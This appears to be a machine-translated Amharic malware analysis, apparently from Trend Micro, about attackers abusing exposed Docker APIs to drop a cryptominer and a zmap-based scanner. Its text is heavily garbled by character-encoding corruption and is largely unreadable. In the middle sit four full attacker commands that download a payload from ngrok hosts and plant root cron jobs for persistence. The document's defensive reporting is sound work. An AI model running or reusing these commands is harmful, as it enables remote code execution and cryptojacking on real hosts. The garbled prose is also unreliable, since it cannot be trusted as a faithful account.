áľááśá˝á ááá¨áłá°á á¨áá áááá ᨠhoneypot áŽáá´áááŽá˝á á áá áá á¨á°á°á á°á áá áá¨á á°ááľáááᢠáĽá á Docker Hub áá á áá á á¨á°áĽ á¨áłá°á ááľá á áá áá áŤáá°ááá ááá áŤáá°áááą á¨ááŞááśá áááľá á ááŞáá˝ áĽáá° ááá á´ áŽáá´áááŽá˝ á¨á°á°áአááá áĽáá áľáá´ á ááá°ááᢠááľá á°ááŽá á áá ááŞááśá áááľá á ááŞáá˝á á¨ááŤááἠá áááááľ á áŤá áá áŤáááááá˘
á á°á¨ááŞá á¨á ááłá¨ áá¨áŚá˝ áá áááľáŤáľ ááŽááŤáá˝ á°áááá áááľ áá¨á¤áľ áŽáá´áááŽá˝ áĽá á áááŹá˝áá˝ ááľáĽ áááá ááááŁáľ.
áŤá ááá á¨á°á áááľ áĽááááá˝ ááá á°á¨á᪠áśááľááŽá˝ áłááŤá á¨áĽáá á¨áŤáá ááľáááŤáá˝ áá áĽáá° ááŁáŞ á áá áśá˝ áĽáá°áááᢠáĽáŁááá áśá¨á áľá á°áśá˝á áĽá ááá á°áááááśá˝á áááľáááľ áááááŞáŤ áá ááááá áááŽá˝ áĽááłááľ áἠáá áᢠááá áá áĽá á áá á¨ááááľ á¨áá áá°áŽáá˝ áŽáá´áááŽá˝ áá¸áᣠá ááŤáŁá ááľá¨á áá áŤááŁá አáĽááśá˝á áááá¨áľ á¨á°áá°á áĽáá á ááŤáŁá ááľáĽ áŤá áá°áá áŞáŤáá˝ á áá°ááá˘
á¨á°ááá á°ááŽá-á áá á°ááŁá á°áááááľá á¨ááááá áĽá áĽáá˛áá á¨áśá¨á áĽáŞáľ á¨á¸áł áľááá á¨ááłáá ááᢠá áľá á°áľ á¨á°ááᨠáĽá áááľ á¨áá á¨ááŤáŁ ááľá ááááľ á áĽááá˝ áĽá áááľ á ááááŽá˝á ááá á¨á á¨ááŤáľáááá¸á áĽáť ááá˘
áŤáá°ááá Docker API á°á ááá á°á áŤá áľáŤ áĽáá˛á°áŤ áŤáľá˝áááá˘
á á፠á áŠá á¨áááá áá
á¨á˘áŤ áá´ áá. á áľá°áá á áŠá ááľáá˝á á¨áááľ ááááŁáľ á¨ááŤáľá˝á á¨á áĽáá á áŤáŁá˘ ááá˘
á 3762 áááľ Docker APIs á áá áľáááľá˘ á 12.02.2019/XNUMX/XNUMX á ážáłá ááá áá á¨á°áá°á¨á°
á¨áĽááľ á°áá°ááľ áĽá á¨ááŤá á ááŤáŽá˝
á°ááŽá-á áá áĽáá
áľáá´ á áá áá°áŽáá˝ áĽááłáł áĽáť áłááá á°áááˇáᢠá¨ááᎠááŞááśá ááááá áśááľááŽá˝á ááá°ááŤáľ áĽáá° áľááľá áĽá
á áá á¨áá áŽáá´áááá á¨áá¨ááá á áá á¨á°ááᥠDocker APIs (ááá°á ááŤá áááá¨áą) á¨ážáłá á¨á°ááá áá¨á áŤáłáŤáᢠáŁááá áááľ áŚááśá á (2018, á¨á áá áááĽ
ᨠhoneypot áááἠááľáłááťáá˝ ááá፠áĽáá°ááŤáłá¨á á¨ááŤáŁ ááľá á á áááá á¨áá áá áá á¨á°áŤáŤá áá
Tty: false
Command: â-c curl âretry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d âhxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283â;echo â* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283dâ >/tmp9bedce/etc/crontab;echo â* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283dâ >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c âcron || crondââ,
Entrypoint: â/bin/shâ
Tty: false,
Command: â-c curl âretry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d âhxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283â;echo â* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283dâ >/tmp570547/etc/crontab;echo â* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283dâ >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c âcron || crondââ,
Entrypoint: â/bin/shâ
Tty: false,
Command: â-c curl âretry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed âhxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4eeâ;echo â* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eedâ >/tmp326c80/etc/crontab;echo â* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eedâ >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c âcron || crondââ,
Entrypoint: â/bin/shâ,
Tty: false,
Cmd: â-c curl âretry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed âhxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4eeâ;echo â* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eedâ >/tmp8b9b5b/etc/crontab;echo â* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eedâ >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c âcron || crondââ,
Entrypoint: â/bin/shâ
áĽáá°ááłá¨áᣠá¨á°á°áááľ áááá˝ á¨ááááąáľ á á¨ááá á¨ááááᥠáŠá áá¤áá˝ ááᢠáĽááá áŠá áá¤áá˝ á áá á¨ááá፠áá á áá¸áᣠáľááá áááŤá áŤááá áľ áá á áá ááááľ á áá˝ááá˘
áááľ á¨ááŤá á ááŤáŽá˝ á áᢠá¨ááááŞáŤá áááááľ (áĽáá° Coinminer.SH.MALXMR.ATNO á°áĽá á¨á°áááá) á¨áááľá áááł áá á¨ááŤáááá ELF áááľá áá፠ááᢠááá°áá áľááŞááľ áá (TrojanSpy.SH.ZNETMAP.A) á¨ááľááá áááá˝á áááááľ áĽá á¨ááŤá á áłá˛áľ á˘áááá˝á ááááá á¨ááŤáááá á¨á°áá°á á¨ááľááá ááłáŞáŤáá˝á áááááľ á¨á°áá°á ááá˘
ᨠdropper áľááŞááľ áááľ á°ááááŽá˝á áŤáľáááŁá, á¨ááŤá ááľá ፠áááľá áááŤáá ááá°ááŤáľ áŤááááá. á¨HOST á°áááá á°ááŽá á áá ááááš á¨áááá áľá áŠá áá¤á áááᣠáĽá RIP á°áááá á¨áá°ááŤá á¨áááľá áááŤá á¨ááá áľá (á áĽáááąáŁ áá˝) ááᢠá¨HOST á°áááá á¨áá˝ á°áááá á á°ááá ááĽá ááá¨áŤáᢠáľááŞááą áá ááá cryptocurrency áááŞáá˝ á á°á áá á áááá áá áĽá¨á°áŠ á ááááá¸áá ááá¨ááἠááááŤáá˘
á¨HOST áĽá RIP á°ááááŽá˝ ááłááá˝áŁáĽáá˛áá áá á¨áááľá áááŞáá˝ áĽá¨á°áŠ á ááááá ááá¨ááἠá¨ááŤáááá áŽáľ á
áááĽ
áááľá áááŁáľ á¨áááአá ááľ, áá° nginx á°áááŻá. á¨áá áľááŞááľ ááá˝ áľáŞáśá˝ á¨áááľá áááŤáá á ááááľ á á¨áŁá˘áá˝ ááľáĽ áá°ááá ááá˝ á áá á áááááśá˝ áá°áááłáᢠáá á áĽáááá áá áźáŽá˝á á¨á ááľ áá°áśá˝ áááá áá áááá á á ááá˘
á¨ááá áľááŞááľ áĽáá˛á áŁá áŞáŤáľ á ááľ. á áľááááášá ááłáŞáŤáá˝ ááá°ááŤáľ á¨á°ááłáłá á¨áŠá áá¤á á áááááľ áá áá°áŤá. á¨ááą ááŤá¨á ᨠzmap binary áá, áĽáąá á ááłá¨ áá¨áŚá˝á áááá°á˝ áĽá áááľ á¨áá áá°áŚá˝á áááá áááááľ áŤááááá. áľááŞááą á¨á°áááľ á áááááśá˝ áá ááááŁáŁáľ áĽá áŁááŽá˝á áááá á á¨ááŤáááá áá áááľáŽá˝ áááá áľá á¨á°ááá á áááááľ á°á¨á᪠áá¨á áááá (áááłá áĽáŞáą)á˘
áľááŞááą áĽáá˛á áááááľ á ááłááľ á¨á ááłá¨ áá¨áĽ áááá˝á á áľááľá áááľááᣠááá áá áá á áľááŞááą áľáŞáľ áá á¨á°áá°á¨á° ááᢠáĽáá˛áá áá°áťáá á¨ááŤááľá á ááľ á¨áłáá áá°áŚá˝á á¨á áááááśáš áŤáááá-á áá á ááŁá Dockerá˘
á á°áťá ááĽááľ á˘áááá˝ á˛áá áŁááŽá˝ á áŤáľ-á°á á¨ááą ááááłáᢠáľááŞááą áĽáá˛á á á áááááśášáŁ áá°áá áŞáŤáá˝áŁ á áŤááľ ááá á¨ááááľ ááľá¨áŽá˝ áá á áááľá¨áľ á˘áááá˝á áŤáŁáŤáᥠRedisᣠJenkinsᣠDrupalᣠMODXáŁ
á¨áĽááľ áŹáá°á á áááĽááľ áááľ á¨áŽáľ áááĽáŤáŽá˝ áá áĽáá°ááłá¨á á¨áśá¨á ááľá ááá˘
á¨áá áá° á
áá á áááááľ áĽá¨á°á°á¨á ááᣠáĽá á¨áłá˝ á°áá zmap á ááłá¨ áá¨áŚá˝á áááááľ áĽáá´áľ áĽá
á áá áĽáá°ááá ááá˘
á¨áá á áľááľá á¨á°áááš á¨á ááłá¨ áá¨áĽ áááá˝ á áᣠá¨áłá˝ á°áá áśá¨áá á¨áᎠá áááááśá˝á ááááá á¨á°áá°á áá°áŚá˝ á áá˘
á
á˝á áłá áá˝ áĽááłá áĽáá°ááŤáłá¨á á¨á áááľ-á¨áá ááľá á¨10 áááŽá áá á áá áááˇá
á á áááá ááááľ áĽá á¨áá áá á áááľá¨áľ áááá˝á á á°ááŤáŠ ááŽáśáŽáá˝ áááľá°ááá á¨ááĽá¨áľ ááŁá˘ CLI ááłáŞáŤ ááááŁáľ áá˝áá
áá ááľá (alpine-curl) áĽáŤáą á°ááŽá á áá áĽááłááá áἠááŁá á¨áááŁá áá, ááá áá á¨áá áĽáá°ááłá¨á, á°ááŽá á áá á°ááŁáŤáľá ááá¨ááá áĽá á áá ááá áá˝áá. á°ááłáłá á¨áśá¨á ááľáá˝ á°ááŽá á áá áĽáá áľáá´áá˝á ááá¨ááá áĽá á áá ááá áá˝áá. áśá¨áá á ááá°á á áá ááłá áá á¨áĽááą áá á áá°ááá˘
áááŽá˝
á áá áááľ ááľáĽ á¨á°áĽáŤáŤá ááľá°áľ á¨áá¨á°ááľá áááŽá˝ á¨áᎠá°á áááľá á¨ááááŞáŤá ááᎠáááľ ááľáĽ ááľááŁáľ á áľááá áááá áŤáłáŤá.
- ááľáááľ á áľá°áłáłáŞáá˝ áĽá ááá˘áá˝áĄ- ááá ááá á¨á ááľ á áááá ááá á¨ááľáĽ á ááłá¨ áá¨áĽ á¨ááᥠáĽáŤááá˝á áááá á áĽáť ááááŠá ááá¨ááἠáááá á¨áĽááľáá á¨á¤áá á á ááĽáŽá˝ áŤá¨áááĄá˘
- á¨á ááľá°á ááĽáśá˝á ááá áá¨á°áᥠá¨ááŤáŁ ááľáá˝ ááá¨áá¸áá áĽá áá¨áááĄáᣠááłá áááá˝á ááľá¨áľá áááľáĄ (á¨áŽáá´ááá ááľáááŞáŤ á áááááľ) áĽá ááľá áŤá áá° á ááłá¨ áá¨áĽ áááááśá˝ áŤááá˘
- á°á¨á°á
áááŽá˝ áĽá á¨á°á áááľ áá´áá˝á ááááľ, áááłá.á¨áśá¨á áĽá á áĽáŽ á¨á°á°áŤá¨á°á áááľ áŁá áŞáá˝ . - á ááŤáŁá ááľáĽ áľááá¨ááá áá°áśá˝ á°á¨á᪠áá¨á áááááľ á¨áŠáŤ áááá˝á áĽá ááľáá˝á á áŤáľ á°á ááááľá áá áá (áááłá ᣠáááááá áááá¨áľ ááá á°áááááľá ááááá)ᢠá¨áá°áá áŞáŤ ááĽáĽá áĽá á¨áłááááľ ááľáľá á á ááááŽá˝áŁ áááá˝ áĽá á¨áľáááľ á áŤáŁá˘áá˝ áá áŤáá°áááą áááŚá˝á ááá¨áłá°á áá¨áłáá˘
Trendmicro DevOps áĄáľáá˝ á°á
áááą á á°á á á áááł áĽáá˛áááĄáŁ á ááĽááľ áĽáá˛áá áĽá á¨áľá áĽáá˛ááአáŤáááᢠTrend ááááŽ
á¨áľááááľ ááááśá˝
á°ááá áá˝
- 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
- f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)
á
ááá: hab.com